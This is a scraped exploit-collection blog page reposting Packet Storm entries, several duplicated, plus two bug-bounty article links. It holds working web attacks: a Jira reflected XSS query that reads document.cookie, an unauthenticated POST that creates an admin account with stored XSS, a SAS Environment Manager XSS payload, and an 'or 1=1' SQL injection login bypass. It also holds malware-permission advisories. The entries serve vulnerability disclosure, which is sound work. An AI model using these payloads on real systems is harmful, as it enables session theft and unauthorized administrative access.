Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Atlassian Jira Server/Data Center 8.16.0 Cross Site Scripting
https://4.bp.blogspot.com/-khon6dqGLkI/WWlvkVAr7qI/AAAAAAAAIQw/JwPgE9u6PkcV9AqklLFI3rOjfEX9YXC4QCLcBGAs/s1600/h96.png
Atlassian Jira Server / Data Center version 8.16.0 suffer from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Atlassian Jira Server/Data Center 8.16.0 Cross Site Scripting
https://4.bp.blogspot.com/-khon6dqGLkI/WWlvkVAr7qI/AAAAAAAAIQw/JwPgE9u6PkcV9AqklLFI3rOjfEX9YXC4QCLcBGAs/s1600/h96.png
Atlassian Jira Server / Data Center version 8.16.0 suffer from a cross site scripting vulnerability.
MD5 |
cf784a036af7c8f27e355469c33191eaDownload
# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)
# Date: 06/05/2021
# Exploit Author: CAPTAIN_HOOK
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira/download/data-center
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
# Tested on: ANY
# CVE : CVE-2021-26078
Description:
The number range searcher component in Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before version 8.13.6, and from version 8.14.0 before version 8.16.1 allows remote attackers inject arbitrary HTML or JavaScript via across site scripting (XSS) vulnerability
*Fixed versions:*
- 8.5.14
- 8.13.6
- 8.16.1
- 8.17.0
POC:
- *Story points* custom field that exists by default in all JIRA Server has 3 types of Search template ( None , number range searcher, number searcher) By default the value of Search template is number range searcher OR number searcher. if the value of Search template was set on number range searcher the JIRA server is vulnerable to XSS attack by lowest privilege . For Testing Check the Story points custom field and it's details ( for verifying that the Search template sets on number range searcher) with your ADMIN account ( just like the images) and in the other window Type this With your least privilege
user : jql=issuetype%20%3D%20Epic%20AND%20%22Story%20Points%22%20%3C%3D%20%22%5C%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%22%20AND%20%22Story%20Points%22%20%3E%3D%20%221%22
Your XSS Will be triggered immediately.
Reference:
https://jira.atlassian.com/browse/JRASERVER-72392?error=login_required&error_description=Login+required&state=9b05ec1f-587c-4014-9053-b6fdbb1efa21
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Personnel Record Management System 1.0 Authentication Bypass / XSS
https://2.bp.blogspot.com/-8IZk1MGzGDs/WWlvRc2I8KI/AAAAAAAAINM/SaF41lFV3n4aBJrQBjJ2SaVGr7WaiJo3gCLcBGAs/s1600/h34.png
Personnel Record Management System version 1.0 unauthenticated administrator addition exploit that also adds a stored cross site scripting payload.
MD5 |
Download
Source:packetstormsecurity.com
Personnel Record Management System 1.0 Authentication Bypass / XSS
https://2.bp.blogspot.com/-8IZk1MGzGDs/WWlvRc2I8KI/AAAAAAAAINM/SaF41lFV3n4aBJrQBjJ2SaVGr7WaiJo3gCLcBGAs/s1600/h34.png
Personnel Record Management System version 1.0 unauthenticated administrator addition exploit that also adds a stored cross site scripting payload.
MD5 |
7830494b80453a138becbe2ae78fc9d3Download
# Exploit Title: Personnel Record Management System | Unauthenticated Add Admin Account (plus Stored XSS)
# Exploit Author: Richard Jones
# Date: 28/06/2021
# Vendor Homepage: https://www.sourcecodester.com/php/5107/record-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5107&title=Record+Management+System+in+PHP+Free+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
#Exploit:
-------------------------------------------------------------------------------------------------
POST /Personnel_record_management_system/add_user.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Personnel_record_management_system/add_user.php
Cookie: PHPSESSID=8bkj7jlpmlbuqtnti8urp7qcmo
Upgrade-Insecure-Requests: 1
username=admin2&password=admin2&firstname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastname=%3Cscript%3Ealert%282%29%3C%2Fscript%3E&type=Admin&save=
-------------------------------------------------------------------------------------------------
This will add a new admin account unauthenticated with stored Cross-Site-Scripting.
XSS can be accessed in history log, Admin account, user account pages
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
SAS Environment Manager 2.5 Cross Site Scripting
https://1.bp.blogspot.com/-9u0QXe9ybeo/WWlvU_DnejI/AAAAAAAAIN0/BUl-HrIsuwE3sKywG67Nuv_wLRABID6oQCLcBGAs/s1600/h45.png
SAS Environment Manager version 2.5 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
SAS Environment Manager 2.5 Cross Site Scripting
https://1.bp.blogspot.com/-9u0QXe9ybeo/WWlvU_DnejI/AAAAAAAAIN0/BUl-HrIsuwE3sKywG67Nuv_wLRABID6oQCLcBGAs/s1600/h45.png
SAS Environment Manager version 2.5 suffers from a persistent cross site scripting vulnerability.
MD5 |
a1bca70f9195c84c7ae4745dbcaceb7eDownload
# Exploit Title: SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS)
# Date: 24/06/2021
# Exploit Author: Luqman Hakim Zahari @ Saitamang
# Vendor Homepage: https://support.sas.com/en/software/environment-manager-support.html
# Version: 2.5
# Tested on: CentOS 7
# CVE : CVE-2021-35475
# Description #
SAS® Environment Manager 2.5 allows XSS through the Name field when creating/editing a server. The XSS will prompt when editing the Configuration Properties.
# Proof of Concept(PoC) # https://github.com/saitamang/CVE-2021-35475/blob/main/README.md
*Steps to Reproduce:*
[1.] Login to your system > On "Resource" tab > "Browse""
[2.] Choose a "Platform"
[3.] Click "Inventory" tab > Under "Servers" tab click "New..."
[4.] Under "General Properties" tab on "Name" field , enter the payload(below) > Filled up other information and click "Ok" button
payload :
name=XSS"><marquee@SAITAMANG
[5.] Successfully saved the payload page will shown
[6.] Then scroll down to bottom under "Configuration Properties" tab > click "Edit" button
[7.] Then the payload will be executed
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan-Dropper.Win32.Scrop.dyi Insecure Permissions
https://1.bp.blogspot.com/-gLNlUWq63_8/WWlvGRw0eoI/AAAAAAAAILQ/4OYXBaTeiPkRlDYcEes6gWLLrvO9LjoiQCLcBGAs/s1600/h138.png
Trojan-Dropper.Win32.Scrop.dyi malware suffers from an insecure permissions vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Trojan-Dropper.Win32.Scrop.dyi Insecure Permissions
https://1.bp.blogspot.com/-gLNlUWq63_8/WWlvGRw0eoI/AAAAAAAAILQ/4OYXBaTeiPkRlDYcEes6gWLLrvO9LjoiQCLcBGAs/s1600/h138.png
Trojan-Dropper.Win32.Scrop.dyi malware suffers from an insecure permissions vulnerability.
MD5 |
d2aa42c41f0e017cbe0ecd11122056a8Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/af207a19fbe313e3f7e123b6b2acffd4.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Trojan-Dropper.Win32.Scrop.dyi
Vulnerability: Insecure Permissions
Description: The malware creates a hidden dir named "gFnFILdc" with insecure permissions under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Type: PE32
MD5: af207a19fbe313e3f7e123b6b2acffd4
Vuln ID: MVID-2021-0262
Dropped files: VsPsGUhq.exe
Disclosure: 06/25/2021
Exploit/PoC:
C:\>cacls gFnFILdc
C:\gFnFILdc BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
C:\>dir /a gFnFILdc
Volume in drive C has no label.
Directory of C:\gFnFILdc
11/29/2017 08:39 AM 1,241,650 VsPsGUhq.exe
1 File(s) 1,241,650 bytes
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Email-Worm.Win32.Trance.a Insecure Permissions
https://3.bp.blogspot.com/-p2bRUn4ag8U/WWlvPJDaCwI/AAAAAAAAIMw/gkQGiTtaXucRRVbpvBkwiWIbJMO4BFlLwCLcBGAs/s1600/h28.png
Email-Worm.Win32.Trance.a malware suffers from an insecure permissions vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Email-Worm.Win32.Trance.a Insecure Permissions
https://3.bp.blogspot.com/-p2bRUn4ag8U/WWlvPJDaCwI/AAAAAAAAIMw/gkQGiTtaXucRRVbpvBkwiWIbJMO4BFlLwCLcBGAs/s1600/h28.png
Email-Worm.Win32.Trance.a malware suffers from an insecure permissions vulnerability.
MD5 |
fb45ce08d60cf295aac4ffd68c5e2a8bDownload
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/ca18a07560efa0308827dc972351301f.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Email-Worm.Win32.Trance.a
Vulnerability: Insecure Permissions
Description: The malware creates a dir named "DCA" and VBS file "log.vbs" with insecure permissions under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Type: PE32
MD5: ca18a07560efa0308827dc972351301f
Vuln ID: MVID-2021-0261
Dropped files: log.vbs, zip.exe
Disclosure: 06/25/2021
Exploit/PoC:
C:\>cacls log.vbs
C:\log.vbs BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
C:\>cacls DCA
C:\DCA BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
C:\>dir DCA
Volume in drive C has no label.
Directory of C:\DCA
06/16/2021 01:45 AM 67,072 zip.exe
1 File(s) 67,072 bytes
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Personnel Record Management System 1.0 SQL Injection
https://4.bp.blogspot.com/-9fc43SI8K3Q/WWlvhaBflZI/AAAAAAAAIQU/x3qxae6Q3eMl1Wf8m-XtOKQ3MaKSPPWfQCLcBGAs/s1600/h90.png
Personnel Record Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
Download
Source:packetstormsecurity.com
Personnel Record Management System 1.0 SQL Injection
https://4.bp.blogspot.com/-9fc43SI8K3Q/WWlvhaBflZI/AAAAAAAAIQU/x3qxae6Q3eMl1Wf8m-XtOKQ3MaKSPPWfQCLcBGAs/s1600/h90.png
Personnel Record Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
58f624d5b154400123a08e3fc900c8e1Download
# Exploit Title: Personnel Record Management System | Admin Bypass (sqli)
# Exploit Author: Richard Jones
# Date: 28/06/2021
# Vendor Homepage: https://www.sourcecodester.com/php/5107/record-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5107&title=Record+Management+System+in+PHP+Free+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
#Exploit:
-------------------------------------------------------------------------------------------------
POST /Personnel_record_management_system/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Personnel_record_management_system/
Cookie: PHPSESSID=8bkj7jlpmlbuqtnti8urp7qcmo
Upgrade-Insecure-Requests: 1
UserName=a%27+or+1%3D1--+-&Password=a&Login=
-------------------------------------------------------------------------------------------------
Unencoded: a'or 1=1-- -
Source:packetstormsecurity.com
How I found my first Chrome bug (CVE-2021–21210)
https://vovohelo.medium.com/how-i-found-my-first-chrome-bug-cve-2021-21210-248a21272248?source=rss------bug_bounty-5
https://vovohelo.medium.com/how-i-found-my-first-chrome-bug-cve-2021-21210-248a21272248?source=rss------bug_bounty-5
On October 31, 2020, @SamyKamkar published his research on NAT Slipstreaming. According to his own words, NAT Slipstreaming —Continue reading on Medium » (https://vovohelo.medium.com/how-i-found-my-first-chrome-bug-cve-2021-21210-248a21272248?source=rss------bug_bounty-5)
The Future of Audits in DeFi Security
https://medium.com/immunefi/the-future-of-audits-in-defi-security-68d8bed15187?source=rss------bug_bounty-5
https://medium.com/immunefi/the-future-of-audits-in-defi-security-68d8bed15187?source=rss------bug_bounty-5